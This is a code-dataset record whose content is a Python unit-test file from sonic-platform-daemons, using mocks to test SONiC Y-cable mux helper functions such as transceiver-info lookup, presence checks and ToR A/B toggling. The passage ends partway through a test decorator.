hexsha
string | size
int64 | ext
string | lang
string | max_stars_repo_path
string | max_stars_repo_name
string | max_stars_repo_head_hexsha
string | max_stars_repo_licenses
list | max_stars_count
int64 | max_stars_repo_stars_event_min_datetime
string | max_stars_repo_stars_event_max_datetime
string | max_issues_repo_path
string | max_issues_repo_name
string | max_issues_repo_head_hexsha
string | max_issues_repo_licenses
list | max_issues_count
int64 | max_issues_repo_issues_event_min_datetime
string | max_issues_repo_issues_event_max_datetime
string | max_forks_repo_path
string | max_forks_repo_name
string | max_forks_repo_head_hexsha
string | max_forks_repo_licenses
list | max_forks_count
int64 | max_forks_repo_forks_event_min_datetime
string | max_forks_repo_forks_event_max_datetime
string | content
string | avg_line_length
float64 | max_line_length
int64 | alphanum_fraction
float64 | qsc_code_num_words_quality_signal
int64 | qsc_code_num_chars_quality_signal
float64 | qsc_code_mean_word_length_quality_signal
float64 | qsc_code_frac_words_unique_quality_signal
float64 | qsc_code_frac_chars_top_2grams_quality_signal
float64 | qsc_code_frac_chars_top_3grams_quality_signal
float64 | qsc_code_frac_chars_top_4grams_quality_signal
float64 | qsc_code_frac_chars_dupe_5grams_quality_signal
float64 | qsc_code_frac_chars_dupe_6grams_quality_signal
float64 | qsc_code_frac_chars_dupe_7grams_quality_signal
float64 | qsc_code_frac_chars_dupe_8grams_quality_signal
float64 | qsc_code_frac_chars_dupe_9grams_quality_signal
float64 | qsc_code_frac_chars_dupe_10grams_quality_signal
float64 | qsc_code_frac_chars_replacement_symbols_quality_signal
float64 | qsc_code_frac_chars_digital_quality_signal
float64 | qsc_code_frac_chars_whitespace_quality_signal
float64 | qsc_code_size_file_byte_quality_signal
float64 | qsc_code_num_lines_quality_signal
float64 | qsc_code_num_chars_line_max_quality_signal
float64 | qsc_code_num_chars_line_mean_quality_signal
float64 | qsc_code_frac_chars_alphabet_quality_signal
float64 | qsc_code_frac_chars_comments_quality_signal
float64 | qsc_code_cate_xml_start_quality_signal
float64 | qsc_code_frac_lines_dupe_lines_quality_signal
float64 | qsc_code_cate_autogen_quality_signal
float64 | qsc_code_frac_lines_long_string_quality_signal
float64 | qsc_code_frac_chars_string_length_quality_signal
float64 | qsc_code_frac_chars_long_word_length_quality_signal
float64 | qsc_code_frac_lines_string_concat_quality_signal
float64 | qsc_code_cate_encoded_data_quality_signal
float64 | qsc_code_frac_chars_hex_words_quality_signal
float64 | qsc_code_frac_lines_prompt_comments_quality_signal
float64 | qsc_code_frac_lines_assert_quality_signal
float64 | qsc_codepython_cate_ast_quality_signal
float64 | qsc_codepython_frac_lines_func_ratio_quality_signal
float64 | qsc_codepython_cate_var_zero_quality_signal
bool | qsc_codepython_frac_lines_pass_quality_signal
float64 | qsc_codepython_frac_lines_import_quality_signal
float64 | qsc_codepython_frac_lines_simplefunc_quality_signal
float64 | qsc_codepython_score_lines_no_logic_quality_signal
float64 | qsc_codepython_frac_lines_print_quality_signal
float64 | qsc_code_num_words
int64 | qsc_code_num_chars
int64 | qsc_code_mean_word_length
int64 | qsc_code_frac_words_unique
null | qsc_code_frac_chars_top_2grams
int64 | qsc_code_frac_chars_top_3grams
int64 | qsc_code_frac_chars_top_4grams
int64 | qsc_code_frac_chars_dupe_5grams
int64 | qsc_code_frac_chars_dupe_6grams
int64 | qsc_code_frac_chars_dupe_7grams
int64 | qsc_code_frac_chars_dupe_8grams
int64 | qsc_code_frac_chars_dupe_9grams
int64 | qsc_code_frac_chars_dupe_10grams
int64 | qsc_code_frac_chars_replacement_symbols
int64 | qsc_code_frac_chars_digital
int64 | qsc_code_frac_chars_whitespace
int64 | qsc_code_size_file_byte
int64 | qsc_code_num_lines
int64 | qsc_code_num_chars_line_max
int64 | qsc_code_num_chars_line_mean
int64 | qsc_code_frac_chars_alphabet
int64 | qsc_code_frac_chars_comments
int64 | qsc_code_cate_xml_start
int64 | qsc_code_frac_lines_dupe_lines
int64 | qsc_code_cate_autogen
int64 | qsc_code_frac_lines_long_string
int64 | qsc_code_frac_chars_string_length
int64 | qsc_code_frac_chars_long_word_length
int64 | qsc_code_frac_lines_string_concat
null | qsc_code_cate_encoded_data
int64 | qsc_code_frac_chars_hex_words
int64 | qsc_code_frac_lines_prompt_comments
int64 | qsc_code_frac_lines_assert
int64 | qsc_codepython_cate_ast
int64 | qsc_codepython_frac_lines_func_ratio
int64 | qsc_codepython_cate_var_zero
int64 | qsc_codepython_frac_lines_pass
int64 | qsc_codepython_frac_lines_import
int64 | qsc_codepython_frac_lines_simplefunc
int64 | qsc_codepython_score_lines_no_logic
int64 | qsc_codepython_frac_lines_print
int64 | effective
string | hits
int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b2f0f9a0add098676f5dc4d4ab925ec501162c2a
| 244,095
|
py
|
Python
|
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
sonic-ycabled/tests/test_y_cable_helper.py
|
itamar-talmon/sonic-platform-daemons
|
9ac12bfb406416b0fb3b03a084d8179bdc53f3a6
|
[
"Apache-2.0"
] | null | null | null |
from .mock_swsscommon import Table
from sonic_platform_base.sfp_base import SfpBase
from swsscommon import swsscommon
from sonic_py_common import daemon_base
from ycable.ycable_utilities.y_cable_helper import *
from ycable.ycable import *
import copy
import os
import sys
import time
if sys.version_info >= (3, 3):
from unittest.mock import MagicMock, patch
else:
from mock import MagicMock, patch
# Stub out platform/DB dependencies at import time so the ycable helper
# module can be imported and exercised without a running SONiC environment.
daemon_base.db_connect = MagicMock()
swsscommon.Table = MagicMock()
# sonic_y_cable is not installed in the unit-test environment; replace the
# whole package (and its y_cable submodule) with mocks before anything
# tries to import it.
sys.modules['sonic_y_cable'] = MagicMock()
sys.modules['sonic_y_cable.y_cable'] = MagicMock()
# Flag read by the code under test to enable unit-test-only behavior.
os.environ["Y_CABLE_HELPER_UNIT_TESTING"] = "1"
class helper_logger:
    """Minimal stand-in for the ycable helper logger.

    Every log method accepts a single message argument and simply reports
    success, so code under test can log freely with no side effects.
    """

    # Shared mock available for callers that need an argument placeholder.
    mock_arg = MagicMock()

    def log_error(self, mock_arg):
        """Pretend to log an error; always succeeds."""
        return True

    def log_warning(self, mock_arg):
        """Pretend to log a warning; always succeeds."""
        return True

    def log_debug(self, mock_arg):
        """Pretend to log a debug message; always succeeds."""
        return True
class TestYCableScript(object):
    """Unit tests for ycable.ycable_utilities.y_cable_helper."""

    def test_xcvrd_helper_class_run(self):
        # Smoke test: the update task can be constructed without raising.
        Y_cable_task = YCableTableUpdateTask()
def test_y_cable_helper_format_mapping_identifier1(self):
rc = format_mapping_identifier("ABC ")
assert(rc == "abc")
def test_y_cable_helper_format_mapping_identifier_no_instance(self):
rc = format_mapping_identifier(None)
assert(rc == None)
def test_gather_arg_from_db_and_check_for_type(self):
arg_tbl = {"Ethernet0": (True, {"abc": "x", "def": "y"})}
dic = {"key": "value"}
rc = gather_arg_from_db_and_check_for_type(
arg_tbl, "Ethernet0", "key", dic, "abc")
assert(rc == ("x", "value", {'abc': 'x', 'def': 'y'}))
def test_gather_arg_from_db_and_check_for_none_type(self):
arg_tbl = {"Ethernet0": (True, {"abcd": "x", "def": "y"})}
dic = {"key": "value"}
rc = gather_arg_from_db_and_check_for_type(
arg_tbl, "Ethernet0", "key", dic, "abc")
assert(rc == (None, "value"), {'abcd': 'x', 'def': 'y'})
    # NOTE(review): these three methods are re-defined verbatim later in this
    # class; Python keeps only the last definition, so these copies are
    # shadowed and never collected by pytest (flake8 F811).
    def test_y_cable_wrapper_get_transceiver_info(self):
        # No platform chassis involved: the sfputil fallback supplies the dict.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'Microsoft',
                                                                   'model': 'model1'}
            transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
            vendor = transceiver_dict.get('manufacturer')
            model = transceiver_dict.get('model')
            assert(vendor == "Microsoft")
            assert(model == "model1")

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis(self, mock_chassis):
        # Platform chassis available: info should come from the SFP object.
        mock_object = MagicMock()
        mock_object.get_transceiver_info.return_value = {'type': '1000_BASE_SX_SFP',
                                                         'hardware_rev': '5',
                                                         'serial': 'PEP3L5D',
                                                         'manufacturer': 'FINISAR',
                                                         'model': 'ABC',
                                                         'connector': 'LC',
                                                         'encoding': '8B10B',
                                                         'ext_identifier': 'SFP',
                                                         'ext_rateselect_compliance': 'DEF',
                                                         'cable_length': '850',
                                                         'nominal_bit_rate': '100',
                                                         'specification_compliance': 'GHI',
                                                         'vendor_date': '2021-01-01',
                                                         'vendor_oui': '00:90:65'}
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        received_xcvr_info = y_cable_wrapper_get_transceiver_info(1)
        # 'type' shadows the builtin here; left as-is (doc-only change).
        type = received_xcvr_info.get('type')
        model = received_xcvr_info.get('model')
        vendor_date = received_xcvr_info.get('vendor_date')
        assert(type == "1000_BASE_SX_SFP")
        assert(model == "ABC")
        assert(vendor_date == "2021-01-01")

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis_not_implemented(self, mock_chassis):
        # Chassis SFP raises NotImplementedError -> wrapper falls back to
        # the sfputil dict, per the values asserted below.
        mock_object = MagicMock()
        mock_object.get_transceiver_info.side_effect = NotImplementedError
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'microsoft',
                                                                   'model': 'simulated'}
            transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
            vendor = transceiver_dict.get('manufacturer')
            model = transceiver_dict.get('model')
            assert(vendor == "microsoft")
            assert(model == "simulated")
    def test_y_cable_wrapper_get_presence(self):
        # sfputil path reports the port as present.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_presence.return_value = True
            presence = y_cable_wrapper_get_presence(1)
            assert(presence == True)

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_presence_with_platform_chassis(self, mock_chassis):
        # Chassis path: presence comes from the SFP object itself.
        mock_object = MagicMock()
        mock_object.get_presence = MagicMock(return_value=True)
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        presence = y_cable_wrapper_get_presence(1)
        assert(presence == True)

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_presence_with_platform_chassis_raise_exception(self, mock_chassis):
        # Chassis raises NotImplementedError -> wrapper falls back to sfputil.
        mock_object = MagicMock(spec=SfpBase)
        mock_object.get_presence = MagicMock(side_effect=NotImplementedError)
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_presence.return_value = True
            assert(y_cable_wrapper_get_presence(1) == True)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.get_muxcable_info', MagicMock(return_value={'tor_active': 'self',
                                                                                              'mux_direction': 'self',
                                                                                              'manual_switch_count': '7',
                                                                                              'auto_switch_count': '71',
                                                                                              'link_status_self': 'up',
                                                                                              'link_status_peer': 'up',
                                                                                              'link_status_nic': 'up',
                                                                                              'nic_lane1_active': 'True',
                                                                                              'nic_lane2_active': 'True',
                                                                                              'nic_lane3_active': 'True',
                                                                                              'nic_lane4_active': 'True',
                                                                                              'self_eye_height_lane1': '500',
                                                                                              'self_eye_height_lane2': '510',
                                                                                              'peer_eye_height_lane1': '520',
                                                                                              'peer_eye_height_lane2': '530',
                                                                                              'nic_eye_height_lane1': '742',
                                                                                              'nic_eye_height_lane2': '750',
                                                                                              'internal_temperature': '28',
                                                                                              'internal_voltage': '3.3',
                                                                                              'nic_temperature': '20',
                                                                                              'nic_voltage': '2.7',
                                                                                              'version_nic_active': '1.6MS',
                                                                                              'version_nic_inactive': '1.7MS',
                                                                                              'version_nic_next': '1.7MS',
                                                                                              'version_self_active': '1.6MS',
                                                                                              'version_self_inactive': '1.7MS',
                                                                                              'version_self_next': '1.7MS',
                                                                                              'version_peer_active': '1.6MS',
                                                                                              'version_peer_inactive': '1.7MS',
                                                                                              'version_peer_next': '1.7MS'}))
    def test_post_port_mux_info_to_db(self):
        # With presence and the mux-info dict fully mocked, posting to the
        # mocked STATE_DB table must not report failure (-1).
        logical_port_name = "Ethernet0"
        mux_tbl = Table("STATE_DB", "Y_CABLE_INFO_TABLE")
        rc = post_port_mux_info_to_db(logical_port_name, mux_tbl)
        assert(rc != -1)
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.get_muxcable_static_info', MagicMock(return_value={'read_side': 'self',
                                                                                                     'nic_lane1_precursor1': '1',
                                                                                                     'nic_lane1_precursor2': '-7',
                                                                                                     'nic_lane1_maincursor': '-1',
                                                                                                     'nic_lane1_postcursor1': '11',
                                                                                                     'nic_lane1_postcursor2': '11',
                                                                                                     'nic_lane2_precursor1': '12',
                                                                                                     'nic_lane2_precursor2': '7',
                                                                                                     'nic_lane2_maincursor': '7',
                                                                                                     'nic_lane2_postcursor1': '7',
                                                                                                     'nic_lane2_postcursor2': '7',
                                                                                                     'tor_self_lane1_precursor1': '17',
                                                                                                     'tor_self_lane1_precursor2': '17',
                                                                                                     'tor_self_lane1_maincursor': '17',
                                                                                                     'tor_self_lane1_postcursor1': '17',
                                                                                                     'tor_self_lane1_postcursor2': '17',
                                                                                                     'tor_self_lane2_precursor1': '7',
                                                                                                     'tor_self_lane2_precursor2': '7',
                                                                                                     'tor_self_lane2_maincursor': '7',
                                                                                                     'tor_self_lane2_postcursor1': '7',
                                                                                                     'tor_self_lane2_postcursor2': '7',
                                                                                                     'tor_peer_lane1_precursor1': '7',
                                                                                                     'tor_peer_lane1_precursor2': '7',
                                                                                                     'tor_peer_lane1_maincursor': '17',
                                                                                                     'tor_peer_lane1_postcursor1': '7',
                                                                                                     'tor_peer_lane1_postcursor2': '17',
                                                                                                     'tor_peer_lane2_precursor1': '7',
                                                                                                     'tor_peer_lane2_precursor2': '7',
                                                                                                     'tor_peer_lane2_maincursor': '17',
                                                                                                     'tor_peer_lane2_postcursor1': '7',
                                                                                                     'tor_peer_lane2_postcursor2': '17'}))
    def test_post_port_mux_static_info_to_db(self):
        # Static (cursor/read-side) info mocked; posting to the mocked
        # STATE_DB static table must not report failure (-1).
        logical_port_name = "Ethernet0"
        mux_tbl = Table("STATE_DB", "Y_CABLE_STATIC_INFO_TABLE")
        rc = post_port_mux_static_info_to_db(logical_port_name, mux_tbl)
        assert(rc != -1)
    # NOTE(review): the six methods below are byte-for-byte duplicates of
    # methods defined earlier in this class (flake8 F811).  Because a class
    # body keeps only the last binding per name, these are the definitions
    # pytest actually collects; the earlier copies are dead.  Consider
    # deleting one set.
    def test_y_cable_helper_format_mapping_identifier1(self):
        # Mixed case + trailing whitespace normalizes to lower case.
        rc = format_mapping_identifier("ABC ")
        assert(rc == "abc")

    def test_y_cable_helper_format_mapping_identifier_no_instance(self):
        # A None identifier is passed through unchanged.
        rc = format_mapping_identifier(None)
        assert(rc == None)

    def test_y_cable_wrapper_get_transceiver_info(self):
        # sfputil fallback supplies the transceiver dict.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'Microsoft',
                                                                   'model': 'model1'}
            transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
            vendor = transceiver_dict.get('manufacturer')
            model = transceiver_dict.get('model')
            assert(vendor == "Microsoft")
            assert(model == "model1")

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis(self, mock_chassis):
        # Chassis path: info comes from the SFP object.
        mock_object = MagicMock()
        mock_object.get_transceiver_info.return_value = {'type': '1000_BASE_SX_SFP',
                                                         'hardware_rev': '5',
                                                         'serial': 'PEP3L5D',
                                                         'manufacturer': 'FINISAR',
                                                         'model': 'ABC',
                                                         'connector': 'LC',
                                                         'encoding': '8B10B',
                                                         'ext_identifier': 'SFP',
                                                         'ext_rateselect_compliance': 'DEF',
                                                         'cable_length': '850',
                                                         'nominal_bit_rate': '100',
                                                         'specification_compliance': 'GHI',
                                                         'vendor_date': '2021-01-01',
                                                         'vendor_oui': '00:90:65'}
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        received_xcvr_info = y_cable_wrapper_get_transceiver_info(1)
        type = received_xcvr_info.get('type')
        model = received_xcvr_info.get('model')
        vendor_date = received_xcvr_info.get('vendor_date')
        assert(type == "1000_BASE_SX_SFP")
        assert(model == "ABC")
        assert(vendor_date == "2021-01-01")

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_transceiver_info_with_platform_chassis_not_implemented(self, mock_chassis):
        # Chassis raises NotImplementedError -> falls back to sfputil values.
        mock_object = MagicMock()
        mock_object.get_transceiver_info.side_effect = NotImplementedError
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_transceiver_info_dict.return_value = {'manufacturer': 'microsoft',
                                                                   'model': 'simulated'}
            transceiver_dict = y_cable_wrapper_get_transceiver_info(1)
            vendor = transceiver_dict.get('manufacturer')
            model = transceiver_dict.get('model')
            assert(vendor == "microsoft")
            assert(model == "simulated")

    def test_y_cable_wrapper_get_presence(self):
        # sfputil path reports the port as present.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_sfputil') as patched_util:
            patched_util.get_presence.return_value = True
            presence = y_cable_wrapper_get_presence(1)
            assert(presence == True)

    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_platform_chassis')
    def test_y_cable_wrapper_get_presence_with_platform_chassis(self, mock_chassis):
        # Chassis path: presence comes from the SFP object.
        mock_object = MagicMock()
        mock_object.get_presence = MagicMock(return_value=True)
        mock_chassis.get_sfp = MagicMock(return_value=mock_object)
        presence = y_cable_wrapper_get_presence(1)
        assert(presence == True)
    # NOTE(review): this method name is re-defined identically at the end of
    # this span (flake8 F811); only the later copy is collected.
    def test_y_cable_toggle_mux_torA_update_status_true(self):
        # Successful toggle to ToR A returns 1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = y_cable_toggle_mux_torA(1)
            assert(rc == 1)

    def test_y_cable_toggle_mux_torA_no_port_instance(self):
        # Missing port instance -> error code -1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
            port_instance.get.return_value = None
            rc = y_cable_toggle_mux_torA(1)
            assert(rc == -1)

    def test_y_cable_toggle_mux_torA_update_status_exception(self):
        # The returned "port" is a plain string, so calling its toggle
        # method presumably raises, driving the exception path to -1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
            port_instance.get.return_value = "simulated_port"
            port_instance.toggle_mux_to_tor_a.return_value = Exception(
                NotImplementedError)
            rc = y_cable_toggle_mux_torA(1)
            assert(rc == -1)

    def test_y_cable_toggle_mux_torA_update_status_true(self):
        # Duplicate of the first method above (F811).
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = y_cable_toggle_mux_torA(1)
            assert(rc == 1)
    def test_y_cable_toggle_mux_torB_no_port_instance(self):
        # Missing port instance -> error code -1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
            port_instance.get.return_value = None
            rc = y_cable_toggle_mux_torB(1)
            assert(rc == -1)

    def test_y_cable_toggle_mux_torB_update_status_exception(self):
        # NOTE(review): the toggle_mux_to_tor_a setup below targets the
        # patched container, not the returned string "port", so it appears
        # inert — the string lacking the method is what triggers the
        # exception path; also a torB test setting tor_a looks like a
        # copy/paste slip.  Behavior still reaches -1.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as port_instance:
            port_instance.get.return_value = "simulated_port"
            port_instance.toggle_mux_to_tor_a.return_value = Exception(
                NotImplementedError)
            rc = y_cable_toggle_mux_torB(1)
            assert(rc == -1)

    def test_y_cable_toggle_mux_torB_update_status_true(self):
        # Successful toggle to ToR B returns 2.
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_b.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = y_cable_toggle_mux_torB(1)
            assert(rc == 2)
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_tor_active_side_1_active(self):
        # read side 1 going active -> toggles to ToR A, returns (1, 1).
        read_side = 1
        state = "active"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (1, 1))

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_tor_active_side_2_active(self):
        # read side 2 going active -> toggles to ToR B, returns (2, 2).
        read_side = 2
        state = "active"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_b.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (2,2))

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_tor_active_side_1_standby(self):
        # read side 1 going standby -> the peer (ToR B) becomes active.
        read_side = 1
        state = "standby"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_b.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (2,1))

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_tor_active_side_2_standby(self):
        # read side 2 going standby -> the peer (ToR A) becomes active.
        read_side = 2
        state = "standby"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (1,2))
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
    def test_update_tor_active_side_no_cable_presence(self):
        # Cable absent -> (-1, -1) error tuple.
        read_side = 1
        state = "active"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (-1,-1))

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0, 1, 2]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
    def test_update_tor_active_side_multiple_mappings(self):
        # Logical port mapping to several physical ports -> (-1, -1).
        read_side = 1
        state = "active"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (-1,-1))
    # NOTE(review): this method name is reused by later definitions in this
    # file (flake8 F811); pytest only collects the last one, so this case
    # (cable reads side 1) is silently skipped — consider renaming.
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_update_tor_active_side_with_read_update(self):
        # read_side == -1 forces a read; cable reports side 1 -> (1, 1).
        read_side = -1
        state = "active"
        logical_port_name = "Ethernet0"
        with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
            mock_toggle_object = MagicMock()
            mock_toggle_object.toggle_mux_to_tor_a.return_value = True
            mock_toggle_object.get_read_side.return_value = 1
            patched_util.get.return_value = mock_toggle_object
            rc = update_tor_active_side(read_side, state, logical_port_name)
            assert(rc == (1, 1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_with_read_update(self):
read_side = -1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
mock_toggle_object.get_read_side.return_value = 2
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (2, 1))
@patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
def test_update_tor_active_side_with_read_update(self):
read_side = -1
state = "active"
logical_port_name = "Ethernet0"
with patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances') as patched_util:
mock_toggle_object = MagicMock()
mock_toggle_object.toggle_mux_to_tor_b.return_value = True
mock_toggle_object.get_read_side.return_value = -1
patched_util.get.return_value = mock_toggle_object
rc = update_tor_active_side(read_side, state, logical_port_name)
assert(rc == (-1, -1))
def test_get_mux_cable_info_without_presence(self):
rc = get_muxcable_info_without_presence()
assert(rc['tor_active'] == 'unknown')
assert(rc['mux_direction'] == 'unknown')
assert(rc['manual_switch_count'] == 'N/A')
assert(rc['auto_switch_count'] == 'N/A')
    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=True))
    def test_get_ycable_physical_port_from_logical_port(self):
        # Single mapping + present cable -> physical port index 0.
        instance = get_ycable_physical_port_from_logical_port("Ethernet0")
        assert(instance == 0)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value=[0]))
    @patch('ycable.ycable_utilities.y_cable_helper.y_cable_wrapper_get_presence', MagicMock(return_value=False))
    def test_get_ycable_physical_port_from_logical_port_physical_port_not_present(self):
        # Cable not present -> -1.
        instance = get_ycable_physical_port_from_logical_port("Ethernet0")
        assert(instance == -1)

    @patch('ycable.ycable_utilities.y_cable_helper.logical_port_name_to_physical_port_list', MagicMock(return_value={}))
